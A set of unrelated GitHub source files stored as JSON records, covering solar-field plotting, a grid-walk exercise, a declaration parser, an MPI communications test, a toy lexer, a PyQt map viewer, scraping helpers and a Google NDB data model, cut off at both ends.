dA=dx*dy\r\n out = R2[(R2['hel_in'])&(R2['hit_rcv'])]\r\n Nrays = len(out)\r\n Fbin = Etas['Eta_SF'] * (CST['Gbn']*CST['A_h1']*N_hel)/(1e3*dA*Nrays)\r\n Q_CPC,X,Y = np.histogram2d(out['xr'],out['yr'],bins=[Nx,Ny],range=[[xmin, xmax], [ymin, ymax]], density=False)\r\n Q_max = Fbin * Q_CPC.max()\r\n fig = plt.figure(figsize=(14, 8))\r\n ax = fig.add_subplot(111, aspect='equal')\r\n for N in 
range(N_CPC):\r\n ax.plot(xCA[N],yCA[N],c='k')\r\n ax.plot(xCO[N],yCO[N],c='k')\r\n X, Y = np.meshgrid(X, Y)\r\n f_s = 16\r\n vmin = 0\r\n vmax = 2000\r\n surf = ax.pcolormesh(X, Y, Fbin*Q_CPC.transpose(),cmap=cm.YlOrRd,vmin=vmin,vmax=vmax)\r\n ax.set_xlabel('E-W axis (m)',fontsize=f_s);ax.set_ylabel('N-S axis (m)',fontsize=f_s);\r\n cb = fig.colorbar(surf, shrink=0.25, aspect=4)\r\n cb.ax.tick_params(labelsize=f_s-2)\r\n fig.text(0.77,0.65,r'$Q_{{rcv}}(kW/m^2)$',fontsize=f_s)\r\n fig.savefig(fldr_rslt+'/'+case+'_radmap_out.png', bbox_inches='tight')\r\n plt.grid()\r\n plt.close()\r\n \r\n del X,Y\r\n \r\n ################## Solar Field #############################\r\n R2f = pd.merge( R2 , SF.loc[hlst] , how='inner', on=['hel'] )\r\n f_s=18\r\n fig = plt.figure(figsize=(12,8))\r\n ax1 = fig.add_subplot(111)\r\n \r\n # vmin = ((np.floor(10*R2f['Eta_SF'].min())-1)/10)\r\n # vmax = (np.ceil(10*R2f['Eta_SF'].max())/10)\r\n \r\n vmin = 0.0\r\n vmax = 1.0\r\n \r\n surf = ax1.scatter(R2f['xi'],R2f['yi'], s=0.5, c=R2f['Eta_SF'], cmap=cm.YlOrRd, vmin=vmin, vmax=vmax )\r\n cb = fig.colorbar(surf, shrink=0.25, aspect=4)\r\n cb.ax.tick_params(labelsize=f_s)\r\n cb.ax.locator_params(nbins=4)\r\n \r\n fig.text(0.76,0.70,r'$\\overline{\\eta_{{SF}}}$'+'={:.3f}'.format(Etas['Eta_SF']),fontsize=f_s)\r\n fig.text(0.76,0.65,r'$N_{{hel}}$'+'={:d}'.format(N_hel),fontsize=f_s)\r\n # plt.title(title+' (av. eff. {:.2f} %)'.format(Etas_SF[eta_type]*100))\r\n ax1.set_xlabel('E-W axis (m)',fontsize=f_s);ax1.set_ylabel('N-S axis (m)',fontsize=f_s);\r\n # ax1.set_title(r'Focal point height: {:.0f}m ($\\eta_{{avg}}$={:.2f})'.format(zf,Eta_cos.mean()),fontsize=f_s)\r\n # ax1.set_title('No eta_cpi',fontsize=f_s)\r\n for tick in ax1.xaxis.get_major_ticks(): tick.label.set_fontsize(f_s)\r\n for tick in ax1.yaxis.get_major_ticks(): tick.label.set_fontsize(f_s)\r\n ax1.grid()\r\n fig.savefig(fldr_rslt+'/'+case+'_SF.png', bbox_inches='tight')\r\n # fig.savefig(fldr_rslt+'/'+case+'_SF.pdf', bbox_inches='tight')\r\n # plt.show()\r\n plt.close(fig)\r\n del R2f, out\r\n \r\n # break\r\n del R2, SF, Etas, CST, CPC, HB, hlst\r\n gc.collect()\r\n # break\r\n","repo_name":"DavidSaldivia/BDR_MCRT","sub_path":"2_OpticalAnalysis_old/0-BDR_OptimFinal.py","file_name":"0-BDR_OptimFinal.py","file_ext":"py","file_size_in_byte":16347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32112836709","text":"def next_position(r, c, command):\n if command == \"right\":\n return r, c + 1\n elif command == \"left\":\n return r, c - 1\n elif command == \"up\":\n return r - 1, c\n elif command == \"down\":\n return r + 1, c\n\n\ndef get_children(r, c):\n children = [\n [r - 1, c],\n [r + 1, c],\n [r, c + 1],\n [r, c - 1]\n ]\n return children\n\n\npresents = int(input())\nsize = int(input())\n\nneighbourhood = []\nsanta_row = 0\nsanta_col = 0\nnice_kids = 0\n\nfor row in range(size):\n row_elements = input().split()\n for col in range(size):\n if row_elements[col] == \"S\":\n santa_row = row\n santa_col = col\n elif row_elements[col] == \"V\":\n nice_kids += 1\n\n neighbourhood.append(row_elements)\n\ncounter_kids = 0\nwhile True:\n command = input()\n if command == \"Christmas morning\":\n break\n neighbourhood[santa_row][santa_col] = \"-\"\n santa_row, santa_col = next_position(santa_row, santa_col, command)\n\n if neighbourhood[santa_row][santa_col] == \"V\":\n presents -= 1\n counter_kids += 1\n elif neighbourhood[santa_row][santa_col] == \"C\":\n presents_delivery = 
get_children(santa_row, santa_col)\n        for cookie_row, cookie_col in presents_delivery:\n            if neighbourhood[cookie_row][cookie_col] != \"-\":\n                presents -= 1\n                if neighbourhood[cookie_row][cookie_col] == \"V\":\n                    counter_kids += 1\n                neighbourhood[cookie_row][cookie_col] = \"-\"\n\n    neighbourhood[santa_row][santa_col] = \"S\"\n    if presents == 0:\n        break\n\nif presents <= 0 and (nice_kids - counter_kids) > 0:\n    print(\"Santa ran out of presents!\")\n\nfor row in neighbourhood:\n    print(*row, sep=\" \")\n\nif nice_kids - counter_kids > 0:\n    print(f\"No presents for {nice_kids - counter_kids} nice kid/s.\")\nelse:\n    print(f\"Good job, Santa! {nice_kids} happy nice kid/s.\")","repo_name":"pepapopova/SoftUni-Courses","sub_path":"Python advanced/multidimensional_lists/exer_two/present_delivery.py","file_name":"present_delivery.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21936776350","text":"\"\"\"\nDefines classes for parsing and compiling box declarations, which consist of a\nname followed by an attribute list in square brackets. Box declarations must\noccupy a single line and must not contain arrows (`->`)::\n\n    <name> [<attributes>]\n\"\"\"\n\nimport re\nfrom functools import reduce\n\nfrom fbrelation.utility import find\n\nfrom fbrelation.exceptions import ParsingError, CompilationError\n\nfrom fbrelation.syntax.attributelist import AttributeListSyntax\n\nfrom fbrelation.declarations.box import FunctionBoxDeclaration, \\\n                                        MacroInputBoxDeclaration, \\\n                                        MacroOutputBoxDeclaration, \\\n                                        MacroBoxDeclaration, \\\n                                        SenderBoxDeclaration, \\\n                                        ReceiverBoxDeclaration\n\nclass BoxSyntax(object):\n    \"\"\"\n    Represents the abstract syntax of a box declaration, which has a name and\n    an attribute list.\n    \"\"\"\n\n    def __init__(self, name, attributeList):\n        \"\"\"\n        Initializes a new box syntax object with the given name and attribute\n        list.\n        \"\"\"\n        self.name = name\n        self.attributes = attributeList\n\n    def __getitem__(self, key):\n        \"\"\"\n        Allows the use of square-bracket notation to retrieve the value of\n        one of this box's attributes.\n        \"\"\"\n        return self.attributes[key]\n\n    def __str__(self):\n        \"\"\"\n        Converts the syntax object into its raw string representation.\n        \"\"\"\n        return '%s [%s]' % (self.name, str(self.attributes))\n\n    def compile(self, boxes, relations):\n        \"\"\"\n        Checks and compiles the abstract syntax structure to create a new\n        :class:`.BoxDeclaration` object of the appropriate subclass.\n\n        :param boxes: The list of box declarations compiled so far.\n        :param relations: The list of relation declarations compiled so far.\n\n        :returns: the newly created box declaration.\n        :raises: a :class:`.CompilationError` if any static checks fail.\n        \"\"\"\n        # Ensure that the box name is not a duplicate\n        if find(lambda b: b.name == self.name, boxes):\n            raise CompilationError(\n                '\"%s\": A box by the name of \"%s\" already exists.' %\n                (str(self), self.name))\n\n        # Declare a helper function to determine whether an attribute has\n        # been included\n        includes = lambda s: s in self.attributes and self.attributes[s]\n\n        # For a plain function box, ensure that both group name and box type\n        # name are included\n        if ((includes('group') and not includes('type')) or\n            (includes('type') and not includes('group'))):\n            raise CompilationError(\n                '\"%s\": Function boxes must have both group and type specified '\n                'as attributes.' 
% str(self))\n\n # Check the attributes to determine which type of box this might be\n isFunction = includes('group') and includes('type')\n isMacroInput = includes('input')\n isMacroOutput = includes('output')\n isMacro = includes('macro')\n isSender = includes('sender')\n isReceiver = includes('receiver')\n\n # Declare helpers to check how many of these conditions is True\n count_true = lambda xs: reduce(\n lambda acc, x: acc + 1 if x else acc, xs, 0)\n exactly_one = lambda xs: count_true(xs) == 1\n\n # Ensure that exactly one of these cases is true: no more, no less\n if not exactly_one((isFunction, isMacroInput, isMacroOutput,\n isMacro, isSender, isReceiver)):\n raise CompilationError(\n '\"%s\": Invalid combination of attributes for a box '\n 'declaration.' % str(self))\n\n # Finally, create a box declaration of the appropriate class\n if isFunction:\n return FunctionBoxDeclaration(\n self.name, self['group'], self['type'])\n if isMacroInput:\n return MacroInputBoxDeclaration(self.name, self['input'])\n if isMacroOutput:\n return MacroOutputBoxDeclaration(self.name, self['output'])\n if isMacro:\n # Require that the given macro name matches an existing relation\n relation = find(lambda r: r.name == self['macro'], relations)\n if not relation:\n raise CompilationError(\n '\"%s\": No relation constraint named \"%s\" yet exists.' %\n (str(self), self['macro']))\n return MacroBoxDeclaration(self.name, relation)\n if isSender:\n return SenderBoxDeclaration(self.name, self['sender'])\n if isReceiver:\n return ReceiverBoxDeclaration(self.name, self['receiver'])\n \n # We should never reach this point\n assert False\n\n @classmethod\n def parse(cls, text):\n \"\"\"\n Parses the given input text to produce a new BoxSyntax object.\n\n :returns: the newly created box syntax object.\n :raises: a :class:`.ParsingError` if syntax is invalid.\n \"\"\"\n # Ensure that there are no extraneous brackets to confuse the regex\n if text.count('[') != 1 or text.count(']') != 1:\n raise ParsingError(\n '\"%s\": Invalid syntax for a box declaration. Expected a '\n 'single attribute block enclosed in square brackets.' % text)\n\n # Match the line against a regular expression, capturing the box name\n # and the contents of the attribute list within the square brackets\n match = re.match(r'([^\\[\\]]*)\\[([^\\[\\]]*)\\]', text)\n if not match:\n raise ParsingError(\n '\"%s\": Invalid syntax for a box declaration. Expected box '\n 'name followed by an attribute block.' 
% text)\n name, attributeText = match.groups()\n\n # Parse the attribute list and create a new BoxSyntax object\n return cls(name.strip(), AttributeListSyntax.parse(attributeText))\n","repo_name":"awforsythe/fbrelation","sub_path":"syntax/box.py","file_name":"box.py","file_ext":"py","file_size_in_byte":6013,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"34382658708","text":"# \"\"\"\n# Runs libEnsemble to test communications\n# Scale up array_size and number of workers as required\n#\n# Execute via the following command:\n# mpiexec -np N python3 {FILENAME}.py\n# where N is >= 2\n# The number of concurrent evaluations of the objective function will be N-1.\n# \"\"\"\n\nfrom __future__ import division\nfrom __future__ import absolute_import\n\nfrom mpi4py import MPI\nimport sys, os\nimport numpy as np\n\n# Prob wrap this in the future libe comms module - and that will have init_comms...\n# and can report what its using - for comms - and in mpi case for packing/unpacking\n# Using dill seems more reliable on Bebop - less unpickle errors\nUSE_DILL = False # True/False (req: pip install dill)\n\nif USE_DILL:\n import dill\n import mpi4py\n # Note for mpi4py v3+ - have to initialize differently than previous\n if int(mpi4py.__version__[0]) >= 3:\n MPI.pickle.__init__(dill.dumps, dill.loads)\n else:\n MPI.pickle.dumps = dill.dumps\n MPI.pickle.loads = dill.loads\n\nfrom libensemble.libE import libE\nfrom libensemble.sim_funcs.comms_testing import float_x1000\nfrom libensemble.gen_funcs.uniform_sampling import uniform_random_sample\nfrom libensemble.register import Register #Only being used to pass workerID\nfrom libensemble.controller import JobController #Only being used to pass workerID\nfrom libensemble.resources import Resources #Only to get number of workers\n\nregistry = Register()\njobctrl = JobController(registry = registry, auto_resources = False)\n#registry.register_calc(full_path=sim_app, calc_type='sim') #Test with no app registered.\nnum_workers = Resources.get_num_workers()\n\narray_size = int(1e6) # Size of large array in sim_specs\nrounds = 2 # Number of work units for each worker\n\nsim_max = num_workers*rounds\n\nsim_specs = {'sim_f': float_x1000, # This is the function whose output is being minimized\n 'in': ['x'], # These keys will be given to the above function\n 'out': [\n ('arr_vals',float,array_size),\n ('scal_val',float),\n ],\n }\n\n# This may not nec. 
be used for this test\n# State the generating function, its arguments, output, and necessary parameters.\ngen_specs = {'gen_f': uniform_random_sample,\n 'in': ['sim_id'],\n 'out': [('x',float,2),\n ],\n 'lb': np.array([-3,-2]),\n 'ub': np.array([ 3, 2]),\n 'gen_batch_size': sim_max,\n 'batch_mode': True,\n 'num_active_gens':1,\n 'save_every_k': 300\n }\n\n#sim_max = num_workers\nexit_criteria = {'sim_max': sim_max}\n\n\nnp.random.seed(1)\npersis_info = {}\nfor i in range(MPI.COMM_WORLD.Get_size()):\n persis_info[i] = {'rand_stream': np.random.RandomState(i)}\n\n## Perform the run\nH, persis_info, flag = libE(sim_specs, gen_specs, exit_criteria, persis_info)\n\n\nif MPI.COMM_WORLD.Get_rank() == 0:\n #import pdb; pdb.set_trace()\n for w in range(1, num_workers+1):\n x = w * 1000.0\n assert np.all(H['arr_vals'][w-1] == x), \"Array values do not all match\"\n assert H['scal_val'][w-1] == x + x/1e7, \"Scalar values do not all match\"\n","repo_name":"rsln-s/libensemble_var","sub_path":"libensemble/tests/regression_tests/test_comms.py","file_name":"test_comms.py","file_ext":"py","file_size_in_byte":3196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10320417631","text":"\r\n\r\nLETTER = 0\r\nDIGIT = 1\r\nSPACE = 2\r\nUNK = 99\r\n\r\nINT_LIT = 10\r\nIDENT = 11\r\nASSIGN_OP = 20\r\nADD_OP = 21\r\nSUB_OP = 22\r\nMULT_OP =23\r\nDIV_OP = 24\r\nLEFT_PAREN = 25\r\nRIGHT_PAREN = 26\r\n\r\nclass Lexer:\r\n def __init__(self, theString):\r\n self._theString = theString\r\n self._currentCharacterPosition = 0\r\n self._currentCharacter = self._theString[self._currentCharacterPosition]\r\n self._lexeme = \"\"\r\n self._nextToken = UNK\r\n self._tokenMap = {'(': LEFT_PAREN, ')' : RIGHT_PAREN, '+' : ADD_OP, '-' : SUB_OP, '*' : MULT_OP, '/' : DIV_OP}\r\n\r\n def updateLexeme(self):\r\n self._lexeme = self._lexeme + self._currentCharacter\r\n\r\n def advance(self):\r\n self._currentCharacterPosition = self._currentCharacterPosition + 1\r\n if (self._currentCharacterPosition) < len(self._theString):\r\n self._currentCharacter = self._theString[self._currentCharacterPosition]\r\n\r\n def charsRemaining(self):\r\n return self._currentCharacterPosition <= (len(self._theString) - 1)\r\n\r\n def getChar(self):\r\n if self._currentCharacter.isalpha():\r\n charClass = LETTER\r\n elif self._currentCharacter.isdigit():\r\n charClass = DIGIT\r\n elif self._currentCharacter == ' ':\r\n charClass = SPACE\r\n else:\r\n charClass = UNK\r\n return charClass\r\n\r\n def lex(self):\r\n charClass = self.getChar()\r\n if self.charsRemaining():\r\n if charClass == SPACE:\r\n charClass = self.getChar()\r\n elif charClass == LETTER:\r\n self.updateLexeme()\r\n ## Add code for identifiers with more than 1 character\r\n self._nextToken = IDENT\r\n elif charClass == DIGIT:\r\n self.updateLexeme()\r\n ## Add code for integers > 9\r\n self._nextToken = INT_LIT\r\n elif charClass == UNK:\r\n self._nextToken = self._tokenMap[self._currentCharacter]\r\n self.updateLexeme()\r\n if charClass != SPACE:\r\n print(\"Next token is {0}, next lexeme is {1}\".format(self._nextToken, self._lexeme))\r\n self._lexeme = \"\"\r\n self.advance()\r\n\r\n def process(self):\r\n while (self.charsRemaining()):\r\n self.lex()\r\n\r\nif __name__ == \"__main__\":\r\n lexer = Lexer(\"ab + b + (c * d) + 121\")\r\n 
lexer.process()\r\n","repo_name":"JacobFullerOBU/ProgrammingLanguages","sub_path":"lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11607563712","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/3/7 20:40\n# @Author : XiaTian\n# @File : 绑定方法与非绑定方法.py\n\n\n'''\n 一、绑定方法:绑定给谁就是谁调用,就会把把谁当做第一个参数传进去\n 1、绑定到对象的方法:在类内部没有被装饰器装饰过的函数属性\n 2、绑定到类的方法:在类内定义被classmethod装饰的方法\n 二、非绑定方法:无法自动传值,之定义了一个普通函数,类和对象都可以调用\n 不与类或者对象绑定,被staticmethod装饰的\n\n 三、应用条件\n\n'''\n\n# classes Po:\n# print('hello')\n#\n# classes Foo:\n#\n# def __init__(self,name):\n# self.name = name\n#\n# def tell(self):\n# print('tell %s',self.name)\n#\n# @classmethod\n# def func(cls,aa):\n# aa()\n# print(cls,aa)\n#\n# @staticmethod\n# def func1(x,y):\n# print(x+y)\n# f = Foo('夏天')\n# Foo.func(Po)\n# f.func(Po)\n\nimport hashlib\nimport time\nimport setting\nclass People:\n\n def __init__(self,name,sex,age):\n self.id = self.creat_id()\n self.name = name\n self.age = age\n self.sex = sex\n\n def tell_info(self):\n print('name:%s age:%s sex:%s'%(self.name,self.age,self.sex))\n\n '需求:用户从配置文件里面读配置进行实例化'\n\n @classmethod\n def from_conf(cls):\n obj = cls(setting.name,setting.age,setting.sex)\n return obj\n\n '需求:需要给每个人编译个id'\n @staticmethod\n def creat_id():\n m = hashlib.md5(str(time.time()).encode('utf-8'))\n return m.hexdigest()\n\n# 绑定给类的由类来调用,将类本身当做第一个参数传入\n# p = People.from_conf()\n# p.tell_info()\np1 = People('admin',18,'man')\np2 = People('yun',25,'man')\np3 = People('tian',28,'man')\n\nprint(p1.id)\nprint(p2.id)\nprint(p3.id)\nprint(p1.creat_id)\nprint(p1.tell_info)","repo_name":"summer5625/Mygit","sub_path":"第三模块_面向对象_网络编程基础/面向对象编程/day5/绑定方法与非绑定方法.py","file_name":"绑定方法与非绑定方法.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30859708098","text":"import sys\nimport xml.etree.ElementTree as ET\nfrom pprint import pprint\nfrom PyQt4 import QtGui, QtCore\n\ndef get_pixel_color(i_x, i_y):\n\t#import PyQt4.QtGui # python-qt4\n\tapp = QtGui.QApplication([])\n\tlong_qdesktop_id = QtGui.QApplication.desktop().winId()\n\tlong_color = QtGui.QPixmap.grabWindow(long_qdesktop_id, i_x, i_y, 1, 1).toImage().pixel(0, 0)\n\ti_colour = int(long_color)\n\treturn ((i_colour >> 16) & 0xff), ((i_colour >> 8) & 0xff), (i_colour & 0xff)\n\nclass Point(object):\n def __init__(self,node): \n if node.tag == \"point\":\n xy = str(node.text).split(\",\")\n self.x = int(xy[0])\n self.y = int(xy[1])\n self.point=(self.x,self.y)\n \n def __str__(self):\n return \"x={0} y={1}\".format(self.x, self.y)\n \n\nclass Shape(object):\n def __init__(self, node):\n self.points = []\n \n for child in node:\n self.points.append(Point(child))\n \n def drawShape(self,qpainter,pen=None):\n if not pen:\n pen = QtGui.QPen(QtCore.Qt.black, 3, QtCore.Qt.SolidLine)\n \n qpainter.setPen(pen)\n \n for index in range(0,len(self.points),1):\n startPoint = self.points[index]\n endPoint = self.points[(index+1)%len(self.points)]\n qpainter.drawLine(startPoint.x,startPoint.y,endPoint.x,endPoint.y)\n\nclass ShapeRunner(QtGui.QWidget):\n def __init__(self,XMLMap=None,app=None):\n super(ShapeRunner,self).__init__()\n self.grabPixel = False\n if app:\n self.long_qdesktop_id = QtGui.QApplication.desktop().winId()\n self.grabPixel = True\n \n self.mapSource = XMLMap\n self.name = \"\"\n self.shapes = []\n self.size = (300,500)\n self.start = None\n self.target = 
None\n \n self.initMap(self.mapSource)\n self.initUI()\n \n\n def initUI(self):\n \n self.setGeometry(40, 40, self.size[0], self.size[1] )\n self.setWindowTitle(str(self.__class__.__name__) + \": \" + self.name)\n self.setWindowIcon(QtGui.QIcon('web.png')) \n \n self.show()\n \n def initMap(self, XMLMap):\n tree = None\n root = None\n if self.mapSource:\n tree = ET.parse(XMLMap)\n root = tree.getroot()\n self.name = str(root.get(\"title\"))\n \n for child in root:\n if child.tag == \"shape\":\n self.shapes.append(Shape(child))\n elif child.tag == \"size\":\n self.getMapSize(child)\n elif child.tag == \"start\":\n self.start = self.getPoint(child)\n elif child.tag == \"target\":\n self.target = self.getPoint(child)\n \n \n def paintEvent(self,e):\n qpainter = QtGui.QPainter()\n qpainter.begin(self)\n self.DrawMap(qpainter)\n self.DrawStart(qpainter)\n self.DrawTarget(qpainter)\n #print get_pixel_color(self.target.x, self.target.y)\n \n if self.grabPixel:\n long_color = QtGui.QPixmap.grabWindow(self.long_qdesktop_id, self.start.x, self.start.y, 1, 1).toImage().pixel(0, 0)\n i_colour = int(long_color)\n print ((i_colour >> 16) & 0xff), ((i_colour >> 8) & 0xff), (i_colour & 0xff)\n qpainter.end()\n \n def DrawMap(self,qpainter):\n for item in self.shapes:\n item.drawShape(qpainter)\n \n def getMapSize(self,node):\n for child in node:\n if str(child.tag) == \"height\":\n self.size = (self.size[0],int(str(child.text)))\n elif str(child.tag) == \"width\":\n self.size = (int(str(child.text)),self.size[1])\n \n def getPoint(self, node):\n retVar = None\n for child in node:\n if str(child.tag) == \"point\":\n retVar = Point(child)\n return retVar\n \n def DrawStart(self,qpainter):\n pen = QtGui.QPen(QtCore.Qt.blue)\n self.DrawPoint(qpainter,pen,self.start)\n \n def DrawTarget(self,qpainter):\n pen = QtGui.QPen(QtCore.Qt.red)\n self.DrawPoint(qpainter,pen,self.target)\n \n def DrawPoint(self,qpainter, pen, point):\n qpainter.setPen(pen)\n qpainter.drawPoint(point.x, point.y) \n \n \n \n\ndef main():\n app = QtGui.QApplication(sys.argv)\n ex = ShapeRunner(\"Maps\\One.xml\",app)\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n main() ","repo_name":"slray/AI","sub_path":"Chapter 4/ShapeRunner.py","file_name":"ShapeRunner.py","file_ext":"py","file_size_in_byte":4559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9472333259","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2021/6/29 19:09\n# @Author : Adyan\n# @File : MyUtils.py\n\nimport json\nimport re\nimport time\nimport pytz\nimport random\n\nfrom datetime import datetime\nfrom faker import Faker\n\nfrom zhanlan_pkg.src.Utils.Mongo_conn import MongoPerson\n\nfake = Faker()\ncntz = pytz.timezone(\"Asia/Shanghai\")\n\n\nclass ReDict:\n\n @classmethod\n def string(\n cls,\n re_pattern: dict,\n string_: str,\n ):\n if string_:\n return {\n key: cls.compute_res(\n re_pattern=re.compile(scale),\n string_=string_.translate(\n {\n ord('\\t'): '', ord('\\f'): '',\n ord('\\r'): '', ord('\\n'): '',\n ord(' '): '',\n })\n )\n for key, scale in re_pattern.items()\n }\n\n @classmethod\n def compute_res(\n cls,\n re_pattern: re,\n string_=None\n ):\n data = [\n result.groups()[0]\n for result in re_pattern.finditer(string_)\n ]\n if data:\n try:\n return json.loads(data[0])\n except:\n return data[0]\n else:\n return None\n\n\nclass Utils:\n\n @classmethod\n def time_cycle(\n cls,\n times,\n int_time=None\n ):\n \"\"\"\n 入库时间规整\n :param times: string - 字符串时间\n :param int_time: 
True and False - 获时间戳\n :return:\n \"\"\"\n if int_time:\n return int(time.mktime(time.strptime(times, \"%Y-%m-%d\")))\n if type(times) is str:\n times = int(time.mktime(time.strptime(times, \"%Y-%m-%d %H:%M:%S\")))\n return str(datetime.fromtimestamp(times, tz=cntz))\n\n @classmethod\n def merge_dic(\n cls,\n dic: dict,\n lst: list\n ):\n \"\"\"\n 合并多个dict\n :param dic: dict - 主dict\n :param lst: list - 多个字典列表方式传入\n :return:\n \"\"\"\n for d in lst:\n for k, v in d.items():\n if v:\n dic[k] = v\n return dic\n\n @classmethod\n def is_None(\n cls,\n dic: dict,\n ) -> dict:\n \"\"\"\n :param dic: dict\n :return: 返回字典中值是None的键值对\n \"\"\"\n return {\n k: v\n for k, v in dic.items()\n if not v\n }\n\n @classmethod\n def find(\n cls, target: str,\n dictData: dict,\n ) -> list:\n queue = [dictData]\n result = []\n while len(queue) > 0:\n data = queue.pop()\n for key, value in data.items():\n if key == target:\n result.append(value)\n elif isinstance(value, dict):\n queue.append(value)\n if result:\n return result[0]\n\n\nclass Headers:\n\n def headers(self, referer=None):\n while True:\n user_agent = fake.chrome(\n version_from=63, version_to=80, build_from=999, build_to=3500\n )\n if \"Android\" in user_agent or \"CriOS\" in user_agent:\n continue\n else:\n break\n if referer:\n return {\n \"user-agent\": user_agent,\n \"referer\": referer,\n }\n return {\n \"user-agent\": user_agent,\n }\n\n\nclass Cookies(object):\n\n def __init__(self, db_name):\n self.mongo_conn = MongoPerson(db_name, 'cookie').test()\n\n def cookie(self):\n return random.choice(list(self.mongo_conn.find()))\n","repo_name":"liujiang9/zhanlan_pkg","sub_path":"src/Utils/MyUtils.py","file_name":"MyUtils.py","file_ext":"py","file_size_in_byte":3790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30528507317","text":"from __future__ import annotations\n\nfrom datetime import date, datetime, timedelta, time\nfrom typing import cast, Union, TypeVar\n\nimport google.cloud.ndb as ndb\n\n#\nfrom .baseNdb_model import BaseNdbModel\n\nfrom ..config.behavior.beh_constants import FEELING_ONLY_CODE_NEG, FEELING_ONLY_CODE_POS\nfrom ..config.behavior.load_yaml import BehaviorSourceSingleton\nfrom ..utils.data_gen import randIntInRange\nfrom .beh_entry import Entry\nfrom .user import DbUser\n\nbehaviorDataShared = BehaviorSourceSingleton() # read only singleton\n\n\nclass PersonBehavior(BaseNdbModel):\n \"\"\"Behavior entries stored by month:\n AncestorKey: userID -> personID -> monthStartDt\n using Entry occur date\n \"\"\"\n\n monthStartDt = ndb.DateProperty(indexed=True)\n personID = ndb.IntegerProperty(required=True, default=0)\n entries = ndb.StructuredProperty(Entry, repeated=True)\n scoredUpTo = ndb.DateTimeProperty(indexed=False)\n _latestEntry = None # actual entry rec; not just the date\n _earliestEntryDate = None # the date\n\n @property\n def entryList(self) -> list[Entry]:\n return cast(list[Entry], self.entries)\n\n @property\n def unscoredEntries(self: PersonBehavior):\n return [e for e in self.entryList if e.modifyDateTime > self.scoredUpTo]\n\n @property\n def yearMonthKeyStr(self: PersonBehavior):\n return PersonBehavior.keyStrFromDate(self.monthStartDt) # type: ignore\n\n @property\n def earliestEntryDate(self: PersonBehavior):\n # print(\"there are {0} behavior entries\".format( len(self.entries) ))\n # print(\"date list is:\")\n # print( [ e.occurDateTime for e in self.entries] )\n if len(self.entryList) < 1:\n return date.today()\n elif 
self._earliestEntryDate != None:\n return self._earliestEntryDate\n\n self._earliestEntryDate = min([e.occurDateTime for e in self.entryList]).date() # type: ignore\n return self._earliestEntryDate\n\n @property\n def latestEntryDate(self: PersonBehavior):\n if len(self.entryList) < 1:\n return date.today()\n elif self._latestEntry == None:\n self._latestEntry = self.entryList[0]\n return self._latestEntry.occurDateTime.date() # type: ignore\n\n @property\n def earliestEntryDtTm(self: PersonBehavior):\n return datetime.combine(self.earliestEntryDate, time.min) + timedelta(\n milliseconds=1\n )\n\n @property\n def latestEntryDtTm(self: PersonBehavior):\n return datetime.combine(self.latestEntryDate, time.min) + timedelta(\n milliseconds=1\n )\n\n def addNewEntry(self: PersonBehavior, entry: Entry):\n \"\"\" \"\"\"\n # cat, subCat = behaviorDataShared.catAndSubForCode(entry.behaviorCode)\n bcn = behaviorDataShared.masterDict.get(entry.behaviorCode)\n assert bcn is not None, \"invalid behCode {0}\".format(entry.behaviorCode)\n entry.categoryCode = bcn.topCategoryCode\n entry.oppositeCode = bcn.oppositeCode\n entry.modifyDateTime = datetime.now()\n # print(\"1) BehCount in {0} is {1}\".format(self.monthStartDt, len(self.entries)))\n self.entries.insert(0, entry)\n self._latestEntry = entry\n self.put()\n # print(\"2) BehCount in {0} is {1}\".format(self.monthStartDt, len(self.entries)))\n self.clearCache()\n\n def updateEntry(self: PersonBehavior, secsFromOrigDtTm: int, entry: Entry):\n \"\"\"use time delta and beh_code to find rec to replace\"\"\"\n originalDtTm: datetime = entry.occurDateTime + timedelta(\n seconds=secsFromOrigDtTm\n )\n originalDtTm = originalDtTm.combine(originalDtTm.date(), time=time(0, 0, 0, 0))\n\n for rowNum, e in enumerate(self.entries):\n if e.occurDateTime == originalDtTm and e.behaviorCode == entry.behaviorCode:\n self.entries[rowNum] = entry\n break\n # modifyDateTime is set in _pre_put_hook\n # if len(self.entryList) < secsFromOrigDtTm + 1:\n # secsFromOrigDtTm = 0\n # entry.modifyDateTime = datetime.now()\n\n # self.entries[secsFromOrigDtTm] = entry\n self._latestEntry = entry\n self.put()\n self.clearCache()\n\n def markJustScored(self):\n self.scoredUpTo = datetime.now()\n self.put_async()\n\n def clearCache(self):\n # nothing currently cached\n return\n\n def _pre_put_hook(self):\n if self._latestEntry != None:\n self._latestEntry.modifyDateTime = datetime.now(tz=None)\n\n @staticmethod\n def loadOrInitByCoreIds(user: DbUser, personID: int, occurDate: date):\n # load one PersonBehavior (user/person/month) combo rec from the DB\n if isinstance(occurDate, datetime):\n occurDate = occurDate.date()\n\n monthStartDt = occurDate.replace(day=1)\n thisMonthKeyRec = PersonBehavior.makeKey(user.id_, personID, monthStartDt)\n res = thisMonthKeyRec.get()\n if not res:\n res = PersonBehavior(\n monthStartDt=monthStartDt, personID=personID, entries=[]\n )\n res.key = thisMonthKeyRec\n res.scoredUpTo = datetime.combine(monthStartDt, time.min) - timedelta(\n days=1\n )\n return res\n\n @classmethod\n def loadAllFromCoreIds(cls, user: DbUser, personID: int) -> list[PersonBehavior]:\n # return list of PersonBehavior recs for every month since started dating\n ancestorKey = cls.makeAncestor(user.id_, personID)\n # below requires custom datastore index\n qry = cls.query(ancestor=ancestorKey).order(-cls.monthStartDt)\n return 